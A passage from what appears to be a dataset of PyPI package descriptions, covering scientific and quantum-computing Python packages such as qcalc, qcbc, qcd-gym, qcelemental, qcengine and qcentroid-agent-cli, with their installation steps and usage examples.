usingqcalcas a standalone Python script, you invoke\nit from a console as follows:python /path-to-qcalc-script/qcalc.py [expression]Alternatively, if you've installedqcalcwithpip, you invoke\nit from a console as follows:qcalc [expression]Batch modeIf you provide the optional [expression] argument, qcalc will evaluate\nthe expression, print the result and terminate.Interactive modeOtherwise, if no [expression] argument is provided, qcalc will start in\nthe interactive mode, where you can enter expressions via your keyboard.FeaturesThe most important feature of \"qcalc\" is that it accepts expressions\nin theC-syntax-- with the same operands and precedence rules as\nin the C or C++ source code. Among others, the expressions can contain\nall bit-wise operators (<<,>>,|,&,^,~) as well as\nmixed decimal,hexadecimalandbinaryconstants.\n\"qcalc\" is also a powerful floating-point scientific calculator and\nsupports all mathematical functions (sin(),cos(),tan(),exp(),ln(), ...). Some examples of acceptable expressions are:((0xBEEF << 16) | 1280) & ~0xFF-- binary operators, mixed hex and decimal numbers($1011 << 24) | (1280 >> 8) ^ 0xFFF0-- mixed @ref qcalc_bin \"binary\", dec and hex numbers(1234 % 55) + 4321//33-- remainder, integer division (note the//integer division operatorpi/6-- pi-constantpow(sin(ans),2) + pow(cos(ans),2)-- scientific floating-point calculations,ans-variableNOTE\"qcalc\" internally uses the Python commandevalto evaluate the expressions.\nPlease refer to the documentation of thePython math expressionsfor more details of supported syntax and features.Automatic Conversion to Hexadecimal and BinaryIf the result of expression evaluation is integer (as opposed to floating point),\n\"qcalc\" automatically displays the result in hexadecimal and binary formats\n(see \"qcalc\" screenshot above). For better readability the hex display shows\nan apostrophe between the two 16-bit half-words (e.g.,0xDEAD'BEEF).\nSimilarly, the binary output shows an apostrophe between the four 8-bit\nbytes (e.g.,0b11011110'10101101'10111110'11101111).Hexadecimal and Binary NumbersAs the extension to the C-syntax, QCalc supports bothhexadecimal numbersandbinary numbers. These numbers are represented as0x...and0b...,\nrespectively, and can be mixed into expressions. Here are a few examples\nof such expressions:(0b0110011 << 14) & 0xDEADBEEF\n(0b0010 | 0b10000) * 123History of InputsAs a console application \"qcalc\" \"remembers\" the history of the recently\nentered expressions. You can recall and navigate the history of previously\nentered expressions by pressing the \"Up\" / \"Down\" keys.The ans Variable\"qcalc\" stores the result of the last computation in theansvariable.\nHere are some examples of expressions with theansvariable:1/ans-- find the inverse of the last computation@nlog(ans)/log(2)-- find log-base-2 of the last computation@n64-bit Range\"qcalc\" supports the 64-bit range and switches to 64-bit arithmetic automatically\nwhen anintegerresult of a computation exceeds the 32-bit range.\nHere are some examples of the 64-bit output:> 0xDEADBEEF << 27\n= 501427843159293952 | 0x06F5'6DF7'7800'0000\n= 0b00000110'11110101'01101101'11110111'01111000'00000000'00000000'00000000\n> 0xDEADBEEF << 24\n= 62678480394911744 | 0x00DE'ADBE'EF00'0000\n= 0b00000000'11011110'10101101'10111110'11101111'00000000'00000000'00000000\n> 0xDEADBEEF << 34\n! out of range\n>Error HandlingExpressions that you enter into \"qcalc\" might have all kinds of errors:\nsyntax errors, computation errors (e.g., division by zero), etc.\nIn all these cases, \"qcalc\" responds with theErrormessage and the\nexplanation of the error:> (2*4) + )\nTraceback (most recent call last):\n File \"C:\\qp\\qtools\\qcalc\\qcalc.py\", line 54, in _main\n result = eval(expr)\n File \"\", line 1\n (2*4) + )\n ^\nSyntaxError: unmatched ')'\n>More InformationMore information about \"qcalc\" is available online at:https://www.state-machine.com/qtools/qcalc.htmlMore information about the QTools collection is available\nonline at:https://www.state-machine.com/qtools/"} +{"package": "qcalibrateremote", "pacakge-description": "A client library for runnig a control optimization with qruise calibrate softwareNoteThe API is experimental and subject to change without a prior noticeDescriptionThe qcalibrateremote package provides interface to QCalibrate optimization service, providing algorithms helping to define optimal control for quantum system.\nThe actual optimization algorithm runs on the server, supplying the set of parameters and/or PWC pulses to client side. The client code evaluates the parameters\nby deriving and applying control signals to a system under control, performing measurement, calcualates and returns the figure of merit (infidelity) value.\nThe algorithm tries different parameters in order to find optimal values to achieve minimal infidelity. Live progress of optimization can be observed in the in web UI,\ngiven opportunity to finish the optimization, before the optimization stopping criteria are achieved.Currently two optimization modes are supported.pure parameter optimizationRandom chopped base PWC function optimization (Fourier and Sigmoid bases)InstallingInstall withpip:$pipinstallqcalibrateremotefor conda environment install grcpio explicitly$condainstallgrpcioUsagePrerequisitsPython 3.8+ (developed and tested with 3.8.5)Qruise Calibrate account (contactr.razilov@fz-juelich.defor details)Direct internet connection to server (may require VPN access)ExperimentExperiment defines is a set of meta-parameters controlling the optimization\nUse use API or Web UI to create an experiment and define optimization parameters. Use online help to get learn about details.\nThe evaluation of figure of merit class can be supplied as classevaluate_fom_class=..or objectevaluate_fom_object=..Pure parameter optimization example# import dependenciesfromtypingimportDictfromqcalibrateremoteimport(EvaluateFigureOfMerit,FigureOfMerit,create_optimizer_client,)# setup client connection (copy form web UI: https://www.qcalibrate.staging.optimal-control.net:31603)experiment_id=\"0xabcd\"token=(\"ey...\")optimizer_client=create_optimizer_client(host=\"grpc.qcalibrate.staging.optimal-control.net\",port=31603,token=token)# define infidelity evaluation classclassDistanceFom(EvaluateFigureOfMerit):def__init__(self,*args,**kwargs)->None:super().__init__()definfidelity(self,param1,param2)->float:return(param1-0.55)**2+(param2-0.33)**2defevaluate(self,parameters:Dict[str,float],**kwargs)->FigureOfMerit:\"\"\"Abstract method for figure of merit evaluation\"\"\"# print(parameters)returnFigureOfMerit(self.infidelity(**parameters),'')# run optimizationoptimization_result=optimizer_client.run(experiment_id=experiment_id,evaluate_fom_class=DistanceFom)# best fitting parametersoptimization_result.top[0].parametersRather than create a completely new configuration, one can update an existing experiment configurationwithoptimizer_client.update_experiment(experiment_id)asexperiment_builder:withexperiment_builder.configuration()asconfiguration:withconfiguration.parameter(\"param1\")asparam1:param1.initial_value=0.7optimization_result=optimizer_client.run(experiment_id=experiment_id,evaluate_fom_class=DistanceFom)# best fitting parametersoptimization_result.top[0].parametersPulse optimization example# import dependenciesfromtypingimportDictfromqcalibrateremoteimport(EvaluateFigureOfMerit,FigureOfMerit,create_optimizer_client,Pulse,)# setup client connection (copy form web UI: https://www.qcalibrate.staging.optimal-control.net:31603)token=(\"ey...\")optimizer_client=create_optimizer_client(host=\"grpc.qcalibrate.staging.optimal-control.net\",port=31603,token=token)experiment_builder=optimizer_client.create_pulse_optimization_experiment(\"Pulse optimization\",\"Created by \"+__file__)# define configurationwithexperiment_builder.configuration()asconfiguration:withconfiguration.time(\"time1\")astime1:time1.initial_value=1time1.optimize=Falsewithconfiguration.pulse(\"pulse1\")aspulse1:pulse1.time_name=\"time1\"pulse1.lower_limit=-1pulse1.upper_limit=1pulse1.bins_number=21withpulse1.fourier_basis()asfourier_basis:fourier_basis.basis_vector_number=5withfourier_basis.uniform_super_parameter_distribution()asuniform_super_parameter_distribution:uniform_super_parameter_distribution.lower_limit=0.01uniform_super_parameter_distribution.upper_limit=5withpulse1.initial_guess()asinitial_guess:initial_guess.function=\"lambda t: 1\"withpulse1.scaling_function()asscaling_function:scaling_function.function=\"lambda t: np.exp(-(t - 0.5)**2/(2*0.2**2))\"withconfiguration.dcrab_settings()asdcrab_settings:dcrab_settings.maximum_iterations_per_super_iteration=50dcrab_settings.super_iteration_number=6experiment_id=optimizer_client.add_experiment(experiment_builder)# define infidelity evaluation classdefexpected_pulse(t):returnnp.sin(2*np.pi*t)**4classSineFom(EvaluateFigureOfMerit):defevaluate(self,parameters:Dict[str,float],pulses:Dict[str,Pulse],**kwargs)->FigureOfMerit:pulse1=pulses[\"pulse1\"]inf=np.sum((expected_pulse(pulse1.times)-pulse1.values)**2)returnFigureOfMerit(inf,'{}')# run optimizationoptimization_result=optimizer_client.run(experiment_id=experiment_id,evaluate_fom_object=SineFom())# plot best fitting pulsepulse1=optimization_result.top[0].pulses[\"pulse1\"]importmatplotlib.pyplotaspltplt.plot(pulse1.times,expected_pulse(pulse1.times))plt.plot(pulse1.times,pulse1.values)"} +{"package": "qcam-sdk", "pacakge-description": "qcam test Packageqcam test package"} +{"package": "qcanvas", "pacakge-description": "No description available on PyPI."} +{"package": "qcarchive-step", "pacakge-description": "SEAMM QCArchive Plug-inA SEAMM plug-in for QCArchiveFree software: BSD-3-ClauseDocumentation:https://molssi-seamm.github.io/qcarchive_step/index.htmlCode:https://github.com/molssi-seamm/qcarchive_stepFeaturesPlease edit this section!AcknowledgementsThis package was created with themolssi-seamm/cookiecutter-seamm-plugintool, which\nis based on the excellentCookiecutter.Developed by the Molecular Sciences Software Institute (MolSSI),\nwhich receives funding from theNational Science Foundationunder\naward CHE-2136142.History2023.3.30 \u2013 Initial working version, with documentation.With the following functionality:Creation of QCArchive datasets from SEAMMAdding structures to entries in a datasetRetrieving structures from a QCArchive dataset back into SEAMM"} +{"package": "qcarchivetesting", "pacakge-description": "No description available on PyPI."} +{"package": "qcat", "pacakge-description": "No description available on PyPI."} +{"package": "qcaus", "pacakge-description": "No description available on PyPI."} +{"package": "qcausality", "pacakge-description": "No description available on PyPI."} +{"package": "qcb", "pacakge-description": "No description available on PyPI."} +{"package": "qcbacktester", "pacakge-description": "UNKNOWN"} +{"package": "qcbc", "pacakge-description": "qcbcqcbcis a python package to quality control synthetic barcode sequences for orthogonal sequencing-based assays such as:Perturb-SeqTAPSeq10x CRISPRCiteSeqClicktagMultiseq10x Feature BarcodingInstallationThe development version can be installed withpipinstallgit+https://github.com/pachterlab/qcbcUsageqcbcconsists of four subcommands:$ qcbc\nusage: qcbc [-h] [--verbose] ...\n\nqcbc 0.0.0: Format sequence specification files\n\npositional arguments:\n \n volume Compute max barcode volume\n ambiguous Find ambiguous barcodes by ec\n pdist Compute pairwise distance between barcodes\n content Compute max barcode content\n homopolymer\n Compute homopolymer distributionBarcode files are expected to contain both the barcode sequence and a name associated with the barcode, separated by a tab. For example$ cat barcodes.txt\nAGCAGTTACAG tag1\nCTTGTACCCAG tag2\n\n$ cat -t barcodes.txt \nCATGGAGGCG^Itag1\nAGCAGTTACAG^Itag2Note thatcat -t file.txtconvertsinto^Iand can be used to verify that the file is properly setup.qcbc ambiguous: find barcodes with shared subsequenceFind barcodes that share subsequences of a given length.qcbc ambiguous -l optionally,-rccan be used to check the reverse complement of the subsequences.corresponds to the subsequence length used to evaluate ambiguity between barcodes.corresponds to the barcode file.Examples# check ambiguous barcodes by subsequences of length 6$qcbcambiguous-l3barcodes.txt\nCAGtag1,tag1,tag2\nTACtag1,tag2qcbc content: compute base distributionCompute the base distribution within each barcode.qcbc content optionally, specify-- frequencyto return the base distribution fractionoptionally, specify--entropyto return the entropy of the base distribution fraction relative to the max entropy.corresponds to the barcode file.Examples$ qcbc content -e barcodes.txt\ntag1\tAGCAGTTACAG\t0.67\ntag2\tCTTGTACCCAG\t0.67qcbc homopolymer: compute homopolymer distributionFind the number of homopolymers of length two or greater.qcbc homopolymer corresponds to the barcode file.Examples$ qcbc homopolymer barcodes.txt\ntag1\tAGCAGTTACAG\t1,0,0,0,0,0,0,0,0,0\ntag2\tCTTGTACCCAG\t1,1,0,0,0,0,0,0,0,0qcbc pdist: compute pairwise distanceCompute the pairwise hamming distance between barcodes.qcbc pdist optionally,-rccan be used to check the reverse complement of the subsequences.corresponds to the barcode file.Examples$ qcbc pdist barcodes.txt\nAGCAGTTACAG\ttag1\tCTTGTACCCAG\ttag2\t8.0qcbc volume: compute size of barcode spaceCompute the fraction of barcode space occupied by the given barcodes.qcbc volume corresponds to the barcode file.Examples$ qcbc volume barcodes.txt\n2 out of 4,194,304 possible unique barcodes representing 0.0000%ContributingThank you for wanting to improveqcbc. If you have a bug that is related toqcbcplease create an issue. The issue should containtheqcbccommand ran,the error message, andtheqcbcand python version.If you'd like to add assays sequence specifications or make modifications to theqcbctool please do the following:Fork the project.# Press \"Fork\" at the top right of the GitHub pageClone the fork and create a branch for your featuregitclonehttps://github.com//qcbc.gitcdqcbc\ngitcheckout-bcool-new-featureMake changes, add files, and commit# make changes, add files, and commit themgitaddpath/to/file1.pypath/to/file2.py\ngitcommit-m\"I made these changes\"Push changes to GitHubgitpushorigincool-new-featureSubmit a pull requestIf you are unfamilar with pull requests, you find more information on theGitHub help page."} +{"package": "qc-benchmark-dwave", "pacakge-description": "qc_benchmarkDescriptioncaict qc multi-access benchmark platformSoftware ArchitectureSoftware architecture descriptionInstallationxxxxxxxxxxxxInstructionsxxxxxxxxxxxxContributionFork the repositoryCreate Feat_xxx branchCommit your codeCreate Pull RequestGitee FeatureYou can use Readme_XXX.md to support different languages, such as Readme_en.md, Readme_zh.mdGitee blogblog.gitee.comExplore open source projecthttps://gitee.com/exploreThe most valuable open source projectGVPThe manual of Giteehttps://gitee.com/helpThe most popular membershttps://gitee.com/gitee-stars/"} +{"package": "qcb-plotting-tools", "pacakge-description": "# QCB Plotting ToolsDescription of the project and the module qcb_plotting_tools.Note that this will be used as a project description for your code/application/library. Replace this withthe corresponding documentation.## How to BuildThe default project layout and build steps are discussed in [BUILD.md](BUILD.md). Some of the informationis related to the AICS build process.**NOTE**: You will also need to install DatasetDatabase in orderto pull data from our data repository! See this for further details:https://github.com/AllenCellModeling/datasetdatabase## Legal documents- [License](LICENSE.txt) _(Before you release the project publicly please check with your manager to ensure the license is appropriate and has been run through legal review as necessary.)_- [Contribution Agreement](CONTRIBUTING.md) _(Additionally update the contribution agreement to reflectthe level of contribution you are expecting, and the level of support you intend to provide.)_"} +{"package": "qcc74x-crypto-plus", "pacakge-description": "No description available on PyPI."} +{"package": "qcccrawl", "pacakge-description": "easy to use as most of the data returned are pandas DataFrame objectscan be easily saved as csv, excel or json filescan be inserted into MySQL or MongodbTarget Usersfinancial market analyst of Chinalearners of financial data analysis with pandas/NumPypeople who are interested in China financial dataInstallationpip install qcccrawlUpgradepip install qcccrawl \u2013upgradeQuick Startgn=crawl.BaiduNews()\ngn.update_info()\nprint(gn.author_wx)\ndf_search = gn.search_news('\u4e2d\u56fd\u94f6\u884c \u7535\u5b50\u94f6\u884c',day=-3, pn=None)\nprint(df_search)\ndf_search.to_excel('./search.xlsx')\ndf_detail = gn.news_detail(top=5)\nprint(df_detail)\ndf_detail.to_excel('./detail.xlsx')return:open high close low volume p_change ma5\ndate\n2012-01-11 6.880 7.380 7.060 6.880 14129.96 2.62 7.060\n2012-01-12 7.050 7.100 6.980 6.900 7895.19 -1.13 7.020\n2012-01-13 6.950 7.000 6.700 6.690 6611.87 -4.01 6.913\n2012-01-16 6.680 6.750 6.510 6.480 2941.63 -2.84 6.813\n2012-01-17 6.660 6.880 6.860 6.460 8642.57 5.38 6.822\n2012-01-18 7.000 7.300 6.890 6.880 13075.40 0.44 6.788\n2012-01-19 6.690 6.950 6.890 6.680 6117.32 0.00 6.770\n2012-01-20 6.870 7.080 7.010 6.870 6813.09 1.74 6.832"} +{"package": "qcc-news", "pacakge-description": "Docs for this project are maintained athttps://gitee.com/qcc100/qcc-news.git."} +{"package": "qccodar", "pacakge-description": "UNKNOWN"} +{"package": "qcc-product", "pacakge-description": "Docs for this project are maintained athttps://gitee.com/qcc100/qcc-product.git."} +{"package": "qcc-wallet", "pacakge-description": "Docs for this project are maintained athttps://gitee.com/qcc100/qcc-wallet.git."} +{"package": "qcd", "pacakge-description": "AuthorsMarcel R.LicenseThe MIT License (MIT)Copyright (c) 2017 Marcel R.Permission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the\n\u201cSoftware\u201d), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to\npermit persons to whom the Software is furnished to do so, subject to\nthe following conditions:The above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "qcdevol", "pacakge-description": "Theqcdevolpackage implements the QCD evolution of\ncouplings, masses, and other renormalization parameters.\nUncertainties can be incorporated into parameters using\nthegvarmodule. QED effects can be included.\nThere are also tools for manipulating\nand evolving perturbation series.See theINSTALLATIONfile for installation\ndirections. Testqcdevolusingmake tests.\nFor documentation, opensrc/html/index.htmlin\na browser. Licensing information is in theLICENSEfile.Created by G. Peter Lepage (Cornell University) 2023Copyright (c) 2023 G. Peter Lepage"} +{"package": "qcd-gym", "pacakge-description": "Quantum Circuit DesignerDescriptionThis repository contains the Quantum Circuit Designer, a genericgymnasiumenvironment to build quantum circuits gate-by-gate usingpennylane, revealing current challenges regarding:State Preparation (SP): Find a gate sequence that turns some initial state into the target quantum state.Unitary Composition (UC): Find a gate sequence that constructs an arbitrary quantum operator.ObservationsThe observation is defined by the full complex vector representation of the state of the current circuit: $s = \\ket{\\boldsymbol{\\Psi}}\\in\\mathbb{C}^{2^\\eta}$.\nWhile this information is only available in quantum circuit simulators efficiently (on real hardware, $\\mathcal{O}(2^\\eta)$ measurements would be needed), it depicts a starting point for RL from which future work should extract a sufficient, efficiently obtainable, subset of information.\nThis $2^\\eta$-dimensional state representation is sufficient for the definition of an MDP-compliant environment, as operations on this state are required to be reversible.ActionsWe use a $4$-dimensionalBoxaction space $\\langle o, q, c, \\Phi \\rangle = a \\in \\mathcal{A} = {\\Gamma \\times \\Omega \\times \\Theta}$ with the following elements:NameParameterTypeDescriptionOperation$o \\in \\Gamma$intspecifying operation (see next table)Qubit$q \\in[0, \\eta)$intspecifying qubit to apply the operationControl$c \\in[0, \\eta)$intspecifying a control qubitParameter$\\Phi \\in[- \\pi,\\pi]$floatcontinuous parameterThe operations $\\Gamma$ are defined as:oOperationConditionTypeArgumentsComments0$\\mathbb{M}$Meassurement$q$Control and Parameter omitted1$\\mathbb{Z}$$q = c$PhaseShift$q,\\Phi$Control omitted1$\\mathbb{Z}$$q \\neq c$ControlledPhaseShift$q,c,\\Phi$-2$\\mathbb{X}$$q = c$X-Rotation$q,\\Phi$Control omitted2$\\mathbb{X}$$q \\neq c$CNOT$q,c$Parameter omitted3$\\mathbb{T}$TerminateAll agruments omittedWith operations according to the following unversal gate set:CNOT: $$CX_{q,c} = \\ket{0}\\bra{0}\\otimes I + \\ket{1}\\bra{1}\\otimes X$$X-Rotation: $$RX(\\Phi) = \\exp\\left(-i \\frac{\\Phi}{2} X\\right)$$PhaseShift: $$P(\\Phi) = \\exp\\left(i\\frac{\\Phi}{2}\\right) \\cdot \\exp\\left(-i\\frac{\\Phi}{2} Z\\right)$$ControlledPhaseShift: $$CP(\\Phi) = I \\otimes \\ket{0} \\bra{0} + P(\\Phi) \\otimes \\ket{1} \\bra{1}$$RewardThe reward is kept $0$ until the end of an episode is reached (either by truncation or termination).\nTo incentivize the use of few operations, a step-cost $\\mathcal{C}_t$ is applied when exceeding two-thirds of the available operations $\\sigma$:\n$$\\mathcal{C}_t=\\max\\left(0,\\frac{3}{2\\sigma}\\left(t-\\frac{\\sigma}{3}\\right)\\right)$$Suitable task reward functions $\\mathcal{R}^{}\\in[0,1]$ are defined, s.t.: $\\mathcal{R}=\\mathcal{R}^{}(s_t,a_t)-C_t$, according to the following challenges:ChallengesState PreparationThe objective of this challenge is to construct a quantum circuit that generates a desired quantum state.\nThe reward is based on thefidelity$\\mathcal{F} = |\\braket{\\psi_{\\text{env}}|\\psi_{\\text{target}}}|^2 \\in [0,1]$ between the target an the final state:\n$$\\mathcal{R}^{SP}(s_t,a_t) = \\begin{dcases} F(s_t, \\Psi), & \\text{if $t$ is terminal.} \\0, & \\text{otherwise.} \\end{dcases}$$\nCurrently, the following states are defined:'SP-random'(a random state overmax_qubits)'SP-bell'(the 2-qubit Bell state)'SP-ghz'(thequbit GHZ state)Unitary CompositionThe objective of this challenge is to construct a quantum circuit that implements a desired unitary operation.\nThe reward is based on theFrobenius norm$D = |U - V(\\Sigma_t)|_2$ between the taget unitary $U$ and the final unitary $V$ based on the sequence of operations $\\Sigma_t = \\langle a_0, \\dots, a_t \\rangle$:$$ R^{UC}(s_t,a_t) = \\begin{dcases} 1 - \\arctan (D), & \\text{if $t$ is terminal.} \\0, & \\text{otherwise.} \\end{dcases}$$The following unitaries are currently available for this challenge:'UC-random'(a random unitary operation onmax_qubits)'UC-hadamard'(the single qubit Hadamard gate)'UC-toffoli'(the 3-qubit Toffoli gate)SeeOutlookfor more challenges to come.Further ObjectivesThe goal of this implementation is to not only construct any circuit that fulfills a specific challenge but to also make this circuit optimal, that is to give the environment further objectives, such as optimizing:Circuit DepthQubit CountGate Count (or: 2-qubit Gate Count)Parameter CountQubit-ConnectivityThese circuit optimization objectives can be switched on by the parameterpunishwhen initializing a new environment.Currently, the only further objective implemented in this environment is thecircuit depth, as this is one of the most important features to restrict for NISQ (noisy, intermediate-scale, quantum) devices. This metric already includes gate count and parameter count to some extent. However, further objectives can easily be added within theRewardclass of this environment (seeOutlook).SetupInstall the quantum circuit designer environmentpipinstallqcd-gymThe environment can be set up as:importgymnasiumasgymenv=gym.make(\"CircuitDesigner-v0\",max_qubits=2,max_depth=10,challenge='SP-bell',render_mode='text',verbose=True)observation,info=env.reset(seed=42);env.action_space.seed(42)for_inrange(9):action=env.action_space.sample()# this is where you would insert your policyobservation,reward,terminated,truncated,info=env.step(action)ifterminatedortruncated:observation,info=env.reset()env.close()The relevant parameters for setting up the environment are:ParameterTypeExplanationmax_qubits $\\eta$intmaximal number of qubits availablemax_depth $\\delta$intmaximal circuit depth allowed (= truncation criterion)challengestrRL challenge for which the circuit is to be built (seeChallenges)punishboolspecifier for turning on multi-objectives (seeFurther Objectives)Running benchmarksRunning benchmark experiments requires a full installation including baseline algorithms extendingstable_baselines3and a plotting framework extendingplotly:\nThis can be achieved by:gitclonehttps://github.com/philippaltmann/QCD.git\npipinstall-e'.[all]'Specify the intended as: \"challenge-qmax_qubits-dmax_depth\":# Run a specific algoritm and challenge (requires `pip install -e '.[train]'`)python-mtrain[A2C|PPO|SAC|TD3]-e# Generate plots from the `results` folder (requires `pip install -e '.[plot]'`)python-mplotresults# To train the provided baseline algorithms, use (pip install -e .[all])./run# Test the circuit designer (requires `pip install -e '.[test]'`)python-mcircuit_designer.test"} +{"package": "qcedu", "pacakge-description": "No description available on PyPI."} +{"package": "qcelemental", "pacakge-description": "QCElementalDocumentation:GitHub PagesCore data structures for Quantum Chemistry. QCElemental also contains physical constants and periodic table data from NIST and molecule handlers.Periodic Table and Physical Constants data are pulled from NIST srd144 and srd121, respectively (details) in a renewable manner (class around NIST-published JSON file).This project also contains a generator, validator, and translator forMolecule QCSchema.\u2728 Getting StartedInstallation. QCElemental supports Python 3.7+.python-mpipinstallqcelementalTo install QCElemental with molecule visualization capabilities (useful in iPython or Jupyter notebook environments):python-mpipinstall'qcelemental[viz]`To install QCElemental with various alignment capabilities usingnetworkxpython-mpipinstall'qcelemental[align]`Or install both:python-mpipinstall'qcelemental[viz,align]`SeedocumentationPeriodic TableA variety of periodic table quantities are available using virtually any alias:>>>importqcelementalasqcel>>>qcel.periodictable.to_E('KRYPTON')'Kr'>>>qcel.periodictable.to_element(36)'Krypton'>>>qcel.periodictable.to_Z('kr84')36>>>qcel.periodictable.to_A('Kr')84>>>qcel.periodictable.to_A('D')2>>>qcel.periodictable.to_mass('kr',return_decimal=True)Decimal('83.9114977282')>>>qcel.periodictable.to_mass('kr84')83.9114977282>>>qcel.periodictable.to_mass('Kr86')85.9106106269Physical ConstantsPhysical constants can be acquired directly from theNIST CODATA:>>>importqcelementalasqcel>>>qcel.constants.Hartree_energy_in_eV27.21138602>>>qcel.constants.get('hartree ENERGY in ev')27.21138602>>>pc=qcel.constants.get('hartree ENERGY in ev',return_tuple=True)>>>pc.label'Hartree energy in eV'>>>pc.dataDecimal('27.21138602')>>>pc.units'eV'>>>pc.comment'uncertainty=0.000 000 17'Alternatively, with the use of thePint unit conversion package, arbitrary\nconversion factors can be obtained:>>>qcel.constants.conversion_factor(\"bohr\",\"miles\")3.2881547429884475e-14Covalent RadiiCovalent radii are accessible for most of the periodic table fromAlvarez, Dalton Transactions (2008) doi:10.1039/b801115j(details).>>>importqcelementalasqcel>>>qcel.covalentradii.get('I')2.626719314386381>>>qcel.covalentradii.get('I',units='angstrom')1.39>>>qcel.covalentradii.get(116)Traceback(mostrecentcalllast):...qcelemental.exceptions.DataUnavailableError:('covalent radius','Lv')>>>qcel.covalentradii.get(116,missing=4.0)4.0>>>qcel.covalentradii.get('iodine',return_tuple=True).dict(){'numeric':True,'label':'I','units':'angstrom','data':Decimal('1.39'),'comment':'e.s.d.=3 n=451','doi':'DOI: 10.1039/b801115j'}van der Waals RadiiVan der Waals radii are accessible for tmost of the periodic table fromMantina, J. Phys. Chem. A (2009) doi: 10.1021/jp8111556(details).>>>importqcelementalasqcel>>>qcel.vdwradii.get('I')3.7416577284064996>>>qcel.vdwradii.get('I',units='angstrom')1.98>>>qcel.vdwradii.get(116)Traceback(mostrecentcalllast):...qcelemental.exceptions.DataUnavailableError:('vanderwaals radius','Lv')>>>qcel.vdwradii.get('iodine',return_tuple=True).dict(){'numeric':True,'label':'I','units':'angstrom','data':Decimal('1.98'),'doi':'DOI: 10.1021/jp8111556'}"} +{"package": "qcengine", "pacakge-description": "QCEngineQuantum chemistry program executor and IO standardizer (QCSchema) for quantum chemistry.ExampleA simple example of QCEngine's capabilities is as follows:>>>importqcengineasqcng>>>importqcelementalasqcel>>>mol=qcel.models.Molecule.from_data(\"\"\"O 0.0 0.000 -0.129H 0.0 -1.494 1.027H 0.0 1.494 1.027\"\"\")>>>inp=qcel.models.AtomicInput(molecule=mol,driver=\"energy\",model={\"method\":\"SCF\",\"basis\":\"sto-3g\"},keywords={\"scf_type\":\"df\"})These input specifications can be executed with thecomputefunction along with a program specifier:>>>ret=qcng.compute(inp,\"psi4\")The results contain a complete record of the computation:>>>ret.return_result-74.45994963230625>>>ret.properties.scf_dipole_moment[0.0,0.0,0.6635967188869244]>>>ret.provenance.cpuIntel(R)Core(TM)i7-7820HQCPU@2.90GHzSee thedocumentationfor more information.LicenseBSD-3C. See theLicense Filefor more information."} +{"package": "qcenter", "pacakge-description": "qcentertest projectFree software: MIT licenseDocumentation:https://qcenter.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.1.0 (2019-09-18)First release on PyPI."} +{"package": "qcentroid-agent-cli", "pacakge-description": "qcentroid-agent-cliClient library to interact with QCentroid Agent API.FunctionsFunctions:obtain status, and contextobtain input datasend output dataset statussend execution logsInstallpipinstallqcentroid-agent-cliUseSimple exampleAs easy as this:fromqcentroid_agent_cliimportQCentroidSolverClientimportlogginglogging.basicConfig(level=logging.DEBUG)API_BASE_URL=\"https://api.qcentroid.xyz\"SOLVER_API_KEY=\"1234-4567-8910\"# Get your solver API_KEY in the platform dashboardSOLVER_ID=\"123\"defmain():# Get the solver detailssolver=QCentroidSolverClient(API_BASE_URL,SOLVER_API_KEY,SOLVER_ID)# Request a queued jobjob=solver.obtainJob()# Notify start of job executionjob.start()# Retrieve the job input datainput_data=job.obtainInputData()output_data={}## TODO: Add your solver code here and generate output_data## Send the solver output data and execution logs to the platformjob.sendOutputData(output_data)job.sendExecutionLog(logs)# End of job executionif__name__==\"__main__\":main()Example for external agents:importrequestsfromqcentroid_agent_cliimportQCentroidSolverClientimportlogginglogging.basicConfig(level=logging.DEBUG)logger=logging.getLogger(__name__)API_BASE_URL=\"https://api.qcentroid.xyz\"SOLVER_API_KEY=\"1234-4567-8910\"# Get your solver API_KEY in the platform dashboardSOLVER_ID=\"123\"defmain():exit=Falseprint(\"QCentroid Agent usage example\")print(\"Starting...\")# Initialize the agent and get the solver details and a valid access tokensolver=QCentroidSolverClient(API_BASE_URL,SOLVER_API_KEY,SOLVER_ID)print(\"Solver initialization successful.\")# Loop to request queued jobs until any exit condition you want to setwhilenotexit:try:print(\"Checking for pending jobs...\")# Request a queued job (the oldest one will be returned)job=solver.obtainJob()ifjob:print(\"New job received.\")# There is a job to be processed!try:print(\"Processing job...\")# Notify the platform we're starting to process this jobjob.start()# Retrieve the input datainput_data=job.obtainInputData()output_data={}## TODO: add your solver code here and generate output_data#print(\"Job processed successfully.\")# Send the solver output data to the platformjob.sendOutputData(output_data)# Send the solver execution logs to check them thorugh the platform dashboard# TODO: job.sendExecutionLog(logs)job.end()exceptExceptionase:# Job execution has failed, notify the platform about the errorprint(\"Error during job execution.\")job.error(e)else:# No queued jobs. Wait for 1 minute and check againprint(\"No pending jobs. Waiting for 1 minute...\")time.sleep(60)exceptrequests.RequestExceptionase:# Error in an API request# Whether parameters are incorrect (URL, api-key or solver_id), or there are connectivity issuesprint(f\"QCentroid Agent: API request failed:{e}\")exit=TrueexceptExceptionase:# Any other errorsprint(f\"QCentroid Agent error:{e}\")exit=Trueprint(\"End.\")if__name__==\"__main__\":main()VersioningUpdate manually on main thepyproject.tomltheversionfield to match the next release tag. Launch anew version on Releasessection selecting a new tag matching the version. Create the release. The release will be published on pypi.orgDebuging locallypipinstall.#install the current version of the componentpythonmain.py#run the client version that uses the package"} +{"package": "qcew", "pacakge-description": "qcewA package for retrieving Quarterly Census of Employment and Wages (QCEW) data from the Bureau of Labor Statistics'database.RequirementsPython \u2265 3.8InstallationUse the package managerpipto install qcew.pipinstallqcewUsageimportqcew# Get the entire quarterly census of employment and wages database for 2020.data=qcew.get_qcew_data(year=\"2020\",annual=False,fields=None)# Get annual average 